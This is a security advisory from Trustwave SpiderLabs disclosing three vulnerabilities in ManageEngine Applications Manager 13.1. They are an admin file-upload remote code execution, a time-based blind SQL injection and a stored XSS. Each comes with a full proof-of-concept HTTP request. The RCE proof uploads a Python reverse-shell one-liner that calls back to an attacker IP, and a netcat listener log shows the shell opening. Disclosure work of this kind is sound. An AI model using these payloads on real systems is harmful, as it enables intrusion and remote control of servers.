Trustwave SpiderLabs Security Advisory TWSL2017-015: Multiple Vulnerabilities in ManageEngine Applications Manager Published: 08/09/2017 Version: 1.0 Vendor: ManageEngine (https://www.manageengine.com/) Product: Applications Manager Version Affected: v13.1 (Build Number 13100) Product Description: Applications Manager is an integrated platform used to monitor an entire application ecosystem - end user, applications, and underlying infrastructure components such as application servers, databases, big data stores, middleware & messaging components, web servers, web services, ERP packages, virtual systems and cloud resources. Finding 1: Remote Code Execution Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs CVE: CVE-2017-11740 DESCRIPTION: Administrative user has the ability to upload files/binaries that can be executed, on the occurrence of an alarm. Attacker can abuse this functionality by uploading a malicious script that can be executed on the remote system. PROOF OF CONCEPT: The following PoC shows the process of exploiting the vulnerability. The first HTTP Request/Response pair shows the script, which contains a reverse shell, that was uploaded to the application. Once uploaded, the admin user can create an "Execute Program" action (see HTTP Request/Response #2). Lastly, the admin can simply click the "play" button to execute the script that was uploaded. The HTTP Response #3 shows a successful execution of the script. As seen in the "ATTACKING MACHINE" section, the reverse shell was established. REQUEST#1: POST /Upload.do HTTP/1.1 Host: a.b.c.d:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://a.b.c.d:9090/Upload.do?service=AppManager&reqForAdminLayout=true Cookie: JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=7_1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------22081952222609 Content-Length: 534 -----------------------------22081952222609 Content-Disposition: form-data; name="theFile"; filename="shell.sh" Content-Type: application/octet-stream python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.128",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' -----------------------------22081952222609 Content-Disposition: form-data; name="uploadDir" ./ -----------------------------22081952222609-- RESPONSE#1: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 10 Feb 2017 10:05:32 GMT Connection: close Content-Length: 25715 <...SNIPPED...>
Icon The file shell.sh was successfully uploaded to Server.
REQUEST#2: POST /adminAction.do HTTP/1.1 Host: a.b.c.d:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://a.b.c.d:9090/showTile.do?TileName=.ExecProg&haid=null Cookie: JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=7_1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 378 actions=%2FshowTile.do%3FTileName%3D.ExecProg%26haid%3Dnull&haid=null&method=createExecProgAction&redirectTo=null&id=0&displayname=Shell&serversite=local&choosehost=-2&host=&monitoringmode=TELNET&username=&password=&description=&port=23&prompt=%24&command=shell.sh&execProgExecDir=%2Fhome%2Felvin%2FManageEngine%2FAppManager13%2FAppManager13%2Fworking&abortafter=10&cancel=false RESPONSE#2: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 10 Feb 2017 10:20:51 GMT Connection: close Content-Length: 105954 <...SNIPPED...> icon   Execute Program action successfully created. REQUEST#3: GET /common/executeScript.do?method=testAction&actionID=10000003&haid=null HTTP/1.1 Host: a.b.c.d:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://a.b.c.d:9090/common/executeScript.do?method=testAction&actionID=10000003&haid=null Cookie: executeProgramActionTable_sortcol=1; executeProgramActionTable_sortdir=down; JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=7_1 Connection: close Upgrade-Insecure-Requests: 1 RESPONSE#3: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Expires: Wed, 31 Dec 1969 16:00:00 PST Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 10 Feb 2017 10:23:11 GMT Connection: close Content-Length: 105773 <...SNIPPED...> icon   The action Shell has been successfully executed ATTACKING MACHINE: root@kali:~# nc -lvp 8888 listening on [any] 8888 ... a.b.c.d: inverse host lookup failed: Unknown host connect to [172.16.1.128] from (UNKNOWN) [a.b.c.d] 34924 $ id uid=1000(elvin) gid=1000(elvin) groups=1000(elvin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ uname -a Linux ubuntu-lab 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux Finding 2: Blind SQL Injection (Unauthenticated) Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs CVE: CVE-2017-11738 DESCRIPTION: The 'haid' parameter of the '/auditLogAction.do' module is vulnerable to a Time-based Blind SQL Injection attack. When the payload ";SELECT+PG_SLEEP(5)--" is submitted to the vulnerable parameter, the application takes around 10030 milliseconds to respond, compared to 12 milliseconds for the original request. This indicates that the injected SQL command caused a time delay PROOF OF CONCEPT: The following PoC shows that the application delays its response for around 10 seconds if the queried table ("pg_user" in this PoC) exists in the database. If the queried table doesn't exist, there's no delay in the application's response. REQUEST: GET /auditLogAction.do?method=getAuditDetailsForMonitorGroup&haid=100000446;SELECT+CASE+WHEN+(SELECT+1+FROM+pg_user+LIMIT+1)=1+THEN+PG_SLEEP(5)+ELSE+PG_SLEEP(0)+END; HTTP/1.1 Host: a.b.c.d:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Upgrade-Insecure-Requests: 1 RESPONSE: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID_APM_9090=D843ABCA263F484F5EC81E4DCADE5636; Path=/; HttpOnly Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 10 Feb 2017 11:22:48 GMT Connection: close Content-Length: 73036 Finding 3: Persistent Cross-site Scripting (XSS) Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs CVE: CVE-2017-11739 DESCRIPTION: Authenticated user, with administrative privileges. has the ability to add a widget on any dashboards. This widget can be a "Utility Widget" which can contain a "Custom HTML or Tex". Once this widget is created, it will be loaded on the dashboard where it was added. With this, an attacker can abuse this functionality to by creating a "Utility Widget" which contains a malicious javascript code. PROOF OF CONCEPT: The first HTTP Request/Response shows the creation of the "Utility Widget" containing the XSS payload. The second one shows the execution of the payload once the widget has been added to the dashboard. REQUEST#1: POST /MyPage.do HTTP/1.1 Host: a.b.c.d:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://a.b.c.d:9090/MyPage.do?method=editWidget&pageid=10000001&widgetid=10000007&sid=1486721073346 Cookie: JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=1_1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 176 method=saveWidget&widgetid=10000007&pageid=10000001&widgetType=303&selectedMonitors=&displayName=Custom+HTML+or+Text&description=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E RESPONSE#1: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 10 Feb 2017 10:05:32 GMT Connection: close Content-Length: 25715 <...SNIPPED...> Custom Html / Text: REQUEST#2: GET /MyPage.do?method=getWidget&pageid=10000001&widgetid=10000007&columns=2&randomnumber=0.5838107195798523& HTTP/1.1 Host: a.b.c.d:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: */* Accept-Language: en-US,en;q=0.5 Referer: http://a.b.c.d:9090/MyPage.do?method=viewDashBoard Cookie: JSESSIONID_APM_9090=29048337F7492D37BCD92E45AF5A41FF; testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJETRjmApTbnPB9srP3yVe0r%2BeYogjCHF2etxCj0z%2FinGzE5xhakURCTv; liveapm-_zldt=947aec4e-12f9-4830-9259-9527f664a2b8; executeProgramActionTable_sortdir=down; executeProgramActionTable_sortcol=1; listMonitorsByorder=false; selectedtabId=hometab; slaAvailabilityTable_sortdir=down; slaAvailabilityTable_sortcol=1; serverSlaTable_sortdir=down; slaDetailsTable_sortdir=down; slaDetailsTable_sortcol=1; selectedtab=1_1 Connection: close RESPONSE#2: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Expires: Wed, 31 Dec 1969 16:00:00 PST Content-Type: text/html;charset=UTF-8 Content-Length: 232 Date: Fri, 10 Feb 2017 10:05:32 GMT Connection: close
Remediation Steps: No official patch is available. To limit exposure, network access to the application manager should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vulnerability Scanners and Intrusion Detection Systems (IDS) may detect the presence of the vulnerability. Trustwave has added coverage for its IDS/IPS platform. Revision History: 02/22/2017 - Vulnerability disclosed to vendor 04/12/2017 - Vendor provides expected patch date to Q2 07/10/2017 - Requested update from vendor (no fix available) 08/09/2017 - Advisory published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.